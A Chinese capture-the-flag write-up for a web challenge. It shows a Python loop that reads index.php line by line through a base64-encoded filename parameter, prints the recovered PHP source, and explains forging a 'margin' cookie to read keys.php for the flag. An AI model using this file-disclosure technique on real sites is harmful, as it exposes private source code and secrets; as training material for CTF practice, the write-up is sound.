那么我们是否可以通过filename访问index.php呢,试一下,将index.php通过base64编码得 aW5kZXgucGhw
然后访问,line应该是行数,随便去试一下就知道了
用脚本把index.php的源码读出来~
1 import requests 2 a=30 3 for i in range(a): 4 url="http://123.206.87.240:8002/web11/index.php?line="+str(i)+"&filename=aW5kZXgucGhw" 5 s=requests.get(url) 6 print (s.text)
源码:
1 <?php 2 error_reporting(0); 3 $file=base64_decode(isset($_GET['filename'])?$_GET['filename']:""); 4 $line=isset($_GET['line'])?intval($_GET['line']):0; 5 if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ="); 6 $file_list = array( 7 '0' =>'keys.txt', 8 '1' =>'index.php', 9 ); 10 if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){ 11 $file_list[2]='keys.php'; 12 } 13 if(in_array($file, $file_list)){ 14 $fa = file($file); 15 echo $fa[$line]; 16 } 17 ?>
构造cookie,margin=margin,访问key.php (用base64编码,这里不再演示)即可
然后右键查看源码就得到flag啦
python脚本取自https://blog.csdn.net/qq_26090065/article/details/81588595